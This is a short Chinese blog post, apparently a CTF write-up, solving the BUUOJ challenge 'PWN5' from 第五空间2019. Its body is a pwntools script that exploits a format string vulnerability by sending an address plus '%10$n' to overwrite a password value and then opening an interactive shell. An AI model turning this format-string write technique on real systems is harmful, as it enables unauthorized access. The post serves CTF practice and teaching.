【PWN】格式化字符串漏洞

vstral 最后更新于 10 天前 0 次阅读 预计阅读时间:


[第五空间2019 决赛]PWN5

from pwn import *
io = remote('node5.buuoj.cn',29141)
context.log_level = 'debug'

io.recvuntil("your name:")
payload=p32(0x0804c044)+b'%10$n'
io.sendline(payload)
io.recvuntil(b"your passwd:")
io.sendline(b'4')
io.interactive()

利用%10$n向的地址写入4(因为0x0804c044占四个字节)

此作者没有提供个人介绍
最后更新于 2025-01-06